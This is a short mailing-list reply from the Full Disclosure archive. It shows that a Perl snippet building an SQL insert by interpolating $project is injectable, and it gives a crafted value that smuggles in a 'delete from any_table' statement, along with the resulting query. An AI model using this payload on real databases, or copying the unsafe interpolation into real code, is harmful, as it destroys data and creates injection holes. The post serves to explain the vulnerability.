Full Disclosure mailing list archives
Re: Question: is this exploitable?
From: "Jonathan A. Zdziarski" <jonathan () nuclearelephant com>
Date: Sat, 18 Oct 2003 09:18:14 -0400
$sth = $dbh->prepare("insert into projects
values(null,\"$project\")");
$project = qq!"); delete from any_table where value in("!;
executes:
insert into projects values(null, ""); delete from any_table where value
in("");
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Question: is this exploitable? Paulo Pereira (Oct 18)
- Re: Question: is this exploitable? Jonathan A. Zdziarski (Oct 18)
- Re: Question: is this exploitable? Jason Dixon (Oct 18)
- Re: Question: is this exploitable? Randal L. Schwartz (Oct 18)
- Re: Question: is this exploitable? John Sage (Oct 18)
- Re: Question: is this exploitable? Codex (Oct 18)
- Re: Question: is this exploitable? Jonathan A. Zdziarski (Oct 18)
- Re: Question: is this exploitable? Paul Tinsley (Oct 18)
- Re: Question: is this exploitable? Jonathan A. Zdziarski (Oct 18)
- Re: Question: is this exploitable? Paul Tinsley (Oct 18)
- Re: Question: is this exploitable? Jonathan A. Zdziarski (Oct 18)
- Re: Question: is this exploitable? Jonathan A. Zdziarski (Oct 18)